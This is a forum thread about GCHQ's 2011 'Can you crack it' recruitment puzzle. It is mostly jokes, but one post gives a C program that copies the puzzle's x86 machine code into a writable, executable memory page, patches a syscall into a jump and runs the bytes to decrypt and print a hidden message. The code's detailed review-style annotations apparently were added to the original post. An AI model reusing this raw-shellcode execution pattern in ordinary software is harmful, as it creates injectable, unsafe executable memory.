
Title: Can you crack it??
Post by: rich83 on December 03, 2011, 09:26:54 am
http://www.canyoucrackit.co.uk/

GCHQ's latest recruitment drive.

Rich
Title: Re: Can you crack it??
Post by: WhiteGTI on December 03, 2011, 01:50:38 pm
Wouldn't even know where to begin with that...
Title: Re: Can you crack it??
Post by: MPS on December 03, 2011, 02:03:26 pm
Unless I'm very much mistaken, that looks like hexadecimal code.
Title: Re: Can you crack it??
Post by: rich83 on December 03, 2011, 02:18:49 pm
Unless I'm very much mistaken, that looks like hexadecimal code.

It is hex.... that's as far as I got!  :signLOL:
Title: Re: Can you crack it??
Post by: PDT on December 03, 2011, 03:34:26 pm
Unless I'm very much mistaken, that looks like hexadecimal code.


Same format as  used in ECU software....  :evilgrin:
Title: Re: Can you crack it??
Post by: rich83 on December 03, 2011, 03:36:35 pm
Unless I'm very much mistaken, that looks like hexadecimal code.


Same format as  used in ECU software....  :evilgrin:

Come on then.....  you and nick should be able to do this blind folded.  :grin:
Title: Re: Can you crack it??
Post by: sub39h on December 03, 2011, 03:36:53 pm
got it... but I won't ruin it for the rest of you  :grin:
Title: Re: Can you crack it??
Post by: monte on December 03, 2011, 05:22:10 pm
Well just to be clever, where it says enter Keyword:………………………... I wrote "Keyword"  :laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
:laugh:
But it was incorrect  :sad1:
Title: Re: Can you crack it??
Post by: B3n on December 03, 2011, 06:00:04 pm
^^^^^^^^ :laugh: :laugh: :laugh: :laugh: :laugh: :laugh: :laugh: :laugh:

I done the same thing :signLOL:

Im awaiting the phone call with the job offer :signLOL:
Title: Re: Can you crack it??
Post by: 182_blue on December 03, 2011, 09:23:52 pm
 :P :P
http://www.canyoucrackit.co.uk/soyoudidit.asp
Title: Re: Can you crack it??
Post by: rob172cup on December 03, 2011, 09:31:17 pm
:P :P
http://www.canyoucrackit.co.uk/soyoudidit.asp

i just used your link to apply ha ha they will soon realise im thick as sh*t !
Title: Re: Can you crack it??
Post by: rich83 on December 03, 2011, 09:31:55 pm
:P :P
http://www.canyoucrackit.co.uk/soyoudidit.asp

LOL
Title: Re: Can you crack it??
Post by: Horatio on December 03, 2011, 10:53:34 pm
Quote
Could you use your skills and ingenuity to combat terrorism and cyber threats?

This made me laugh!  :stupid: :signLOL:
Title: Re: Can you crack it??
Post by: Deako on December 05, 2011, 08:32:53 am
Here is the proper solution:

Quote
#include <stdio.h>
#include <stdint.h>
#include <malloc.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <time.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <sys/utsname.h>

#include "part2.h" // see information above

/*
 * First-stage blob: 160 bytes that main() copies to the start of the
 * executable page and later runs.
 *
 * Read as 32-bit x86 machine code, the bytes do the following:
 *   - 0x00: short jmp over the four data bytes at 0x02..0x05
 *   - 0x06: reserve 0x100 bytes of stack and fill them with 0..255
 *   - 0x15: permute that table with a 4-byte key taken from 0xdeadbeef
 *           (an RC4-like key schedule), then jump to the call at 0x97
 *   - 0x97: call back to 0x39, which uses the pushed return address to find
 *           the data that follows the code and loads it into esp (pop esp)
 *   - 0x42: require the dwords 0x41414141 and 0x42424242, read a length
 *           dword, copy that many bytes onto the original stack and
 *           XOR-decrypt them there with the permuted table
 *   - 0x8d: set eax = 1, ebx = 0 and execute int 0x80 (bytes cd 80 at 0x93)
 * The final four bytes are the 0x41414141 marker; the 0x42424242 marker, the
 * length and the encrypted data are expected to follow directly in memory.
 *
 * NOTE(review): the element type is plain char, so initialisers above 0x7f
 * rely on an implementation-defined conversion where char is signed;
 * unsigned char would state the intent exactly.
 */
static char part1[] = {
    0xeb, 0x04, 0xaf, 0xc2, 0xbf, 0xa3, 0x81, 0xec,   0x00, 0x01, 0x00, 0x00, 0x31, 0xc9, 0x88, 0x0c,
    0x0c, 0xfe, 0xc1, 0x75, 0xf9, 0x31, 0xc0, 0xba,   0xef, 0xbe, 0xad, 0xde, 0x02, 0x04, 0x0c, 0x00,
    0xd0, 0xc1, 0xca, 0x08, 0x8a, 0x1c, 0x0c, 0x8a,   0x3c, 0x04, 0x88, 0x1c, 0x04, 0x88, 0x3c, 0x0c,
    0xfe, 0xc1, 0x75, 0xe8, 0xe9, 0x5c, 0x00, 0x00,   0x00, 0x89, 0xe3, 0x81, 0xc3, 0x04, 0x00, 0x00,
    0x00, 0x5c, 0x58, 0x3d, 0x41, 0x41, 0x41, 0x41,   0x75, 0x43, 0x58, 0x3d, 0x42, 0x42, 0x42, 0x42,
    0x75, 0x3b, 0x5a, 0x89, 0xd1, 0x89, 0xe6, 0x89,   0xdf, 0x29, 0xcf, 0xf3, 0xa4, 0x89, 0xde, 0x89,
    0xd1, 0x89, 0xdf, 0x29, 0xcf, 0x31, 0xc0, 0x31,   0xdb, 0x31, 0xd2, 0xfe, 0xc0, 0x02, 0x1c, 0x06,
    0x8a, 0x14, 0x06, 0x8a, 0x34, 0x1e, 0x88, 0x34,   0x06, 0x88, 0x14, 0x1e, 0x00, 0xf2, 0x30, 0xf6,
    0x8a, 0x1c, 0x16, 0x8a, 0x17, 0x30, 0xda, 0x88,   0x17, 0x47, 0x49, 0x75, 0xde, 0x31, 0xdb, 0x89,
    0xd8, 0xfe, 0xc0, 0xcd, 0x80, 0x90, 0x90, 0xe8,   0x9d, 0xff, 0xff, 0xff, 0x41, 0x41, 0x41, 0x41,
};

// Stub appended after part2 to dump the decrypted memory.
// Using the Linux i386 int 0x80 interface (eax = 4 is write, eax = 1 is exit) it:
//   1. writes 0x31 bytes starting at edi-0x32 to fd 1,
//   2. writes a single newline byte to fd 1,
//   3. exits with status 0.
// The stub relies on edi as left by the preceding code; it never returns.
// NOTE(review): the write starts 0x32 bytes below edi but covers only 0x31
// bytes, so the last byte before edi is not printed - presumably deliberate,
// confirm against the decrypted data.
static const char dump_mem[] = {
    0xba, 0x31, 0x00, 0x00, 0x00,   // mov    edx, 0x31         - byte count for the write
    0x8d, 0x4f, 0xce,               // lea    ecx, [edi-0x32]   - buffer address
    0x31, 0xdb,                     // xor    ebx, ebx
    0x43,                           // inc    ebx (stdout)
    0x31, 0xc0,                     // xor    eax, eax
    0xb0, 0x04,                     // mov    al, 0x4           - sys_write
    0xcd, 0x80,                     // int    0x80
    0x31, 0xdb,                     // xor    ebx,ebx
    0x43,                           // inc    ebx (stdout)
    0x31, 0xd2,                     // xor    edx,edx
    0x42,                           // inc    edx               - one byte
    0x68, 0x0a, 0x00,0x00, 0x00,    // push   0xa               - '\n', stored via esp
    0x8d, 0x0c, 0x24,               // lea    ecx,[esp]
    0xb8, 0x04, 0x00,0x00, 0x00,    // mov    eax, 0x4
    0xcd, 0x80,                     // int    0x80              - sys_write
    0x31, 0xdb,                     // xor    ebx,ebx           - exit status 0
    0x31, 0xc0,                     // xor    eax,eax
    0x40,                           // inc    eax
    0xcd, 0x80,                     // int    0x80              - sys_exit
};

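/**
 * Replace the first `int 0x80` instruction in a code buffer with a short jmp.
 *
 * Scans ptr[0..size) for the byte pair cd 80 and overwrites the first match
 * with eb 45 (jmp rel8, displacement 0x45). The displacement is fixed, so
 * where the jump lands depends entirely on what the caller placed after the
 * patched instruction.
 *
 * The listing as posted tested `*(uint16_t *)&ptr`, which reads the pointer
 * variable rather than the buffer, so nothing in the buffer was ever
 * inspected or patched. The scan below indexes the buffer and compares bytes,
 * which also avoids the unaligned 16-bit access and the read past the end on
 * the last iteration.
 *
 * @param ptr   writable buffer holding the machine code to patch
 * @param size  number of bytes of ptr that may be examined
 * @return 0 if a pair was patched, 1 if none was found (or ptr is NULL)
 */
uint32_t patch_mem(char *ptr, size_t size)
{
    unsigned char *code = (unsigned char *)ptr;
    size_t i;

    if (code == NULL) {
        return 1;
    }

    /* i + 1 < size keeps both bytes of the pair inside the buffer. */
    for (i = 0; i + 1 < size; i++) {
        if (code[i] == 0xcd && code[i + 1] == 0x80) {
            code[i] = 0xeb;
            code[i + 1] = 0x45;
            return 0;
        }
    }
    return 1;
}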

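/**
 * Report whether the running kernel identifies its machine as "i686".
 *
 * A failed uname() is treated as "not supported" instead of comparing against
 * an uninitialised structure.
 *
 * NOTE(review): uname() describes the kernel, not the word size of this
 * process, so a 32-bit build on an x86_64 kernel (or on i386/i586) is
 * rejected by this test.
 *
 * @return 0 if the machine string is exactly "i686", 1 otherwise
 */
uint32_t check_arch(void)
{
    struct utsname kernel_info;

    if (uname(&kernel_info) != 0) {
        return 1;
    }
    return strcmp(kernel_info.machine, "i686") != 0;
}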

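/*
 * Lays out part1, part2 (from part2.h) and the dump_mem stub back to back in
 * one page, patches part1's exit syscall into a jump, and calls the page as a
 * function. Control does not come back: the stub ends in sys_exit.
 *
 * Changes against the posted listing:
 *   - the status printf literals were split across lines with a bullet, which
 *     does not compile; they are single-line again with a "[*]" prefix
 *     (presumably the original text, eaten by forum markup)
 *   - the combined payload size is checked against the page before copying,
 *     because part2's size comes from a header this file does not control
 *   - pointer arithmetic is done on unsigned char *, not void *
 *   - stdout is flushed before the call, since the stub exits through a raw
 *     syscall and buffered output would otherwise be lost
 *   - a failed patch now exits with status 1 like the other error paths
 *
 * Returns 1 on any setup failure.
 */
int main(int argc, char **argv)
{
    enum { PAGE_BYTES = 4096 };
    const size_t payload_len = sizeof(part1) + sizeof(part2) + sizeof(dump_mem);
    void *mem;
    unsigned char *dst;

    (void)argc;
    (void)argv;

    if (check_arch()) {
        printf("[-] this program must run on a 32-bit architecture\n");
        return 1;
    }

    /* Refuse to copy past the single page allocated below. */
    if (payload_len > PAGE_BYTES) {
        printf("[-] error: payload does not fit in one page\n");
        return 1;
    }

    printf("[*] allocating page aligned memory\n");

    mem = memalign(PAGE_BYTES, PAGE_BYTES);
    if (!mem) {
        printf("[-] error: %s\n", strerror(errno));
        return 1;
    }
    memset(mem, 0, PAGE_BYTES);

    printf("[*] setting page permissions\n");

    /*
     * The page stays writable while it executes: part1 loads esp from its
     * own return address (pop esp), so the stub's later push stores into
     * this page.
     */
    if (mprotect(mem, PAGE_BYTES, PROT_READ | PROT_WRITE | PROT_EXEC)) {
        printf("[-] error: %s\n", strerror(errno));
        return 1;
    }

    printf("[*] copying payload\n");

    dst = mem;
    memcpy(dst, part1, sizeof(part1));
    dst += sizeof(part1);
    memcpy(dst, part2, sizeof(part2));
    dst += sizeof(part2);
    memcpy(dst, dump_mem, sizeof(dump_mem));

    printf("[*] adding dump_mem payload\n");

    /*
     * NOTE(review): the patched jmp has a fixed displacement of 0x45; from
     * the int 0x80 at part1 offset 0x93 it lands at page offset 0xda, which
     * is the first byte of dump_mem only if part2 is 0x3a bytes long.
     * part2.h is not part of this listing - confirm its size.
     */
    if (patch_mem(mem, sizeof(part1))) {
        printf("[-] failed to patch memory\n");
        return 1;
    }

    printf("[*] executing payload..\n\n");

    /* The stub leaves through sys_exit, so stdio never gets to flush. */
    fflush(stdout);

    /*
     * Hands control to the copied bytes, including whatever part2.h
     * supplied; nothing after this call is expected to run.
     */
    ((int (*)(void))mem)();

    return 0;
}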


Worked it out on my own. LOL. Errr.........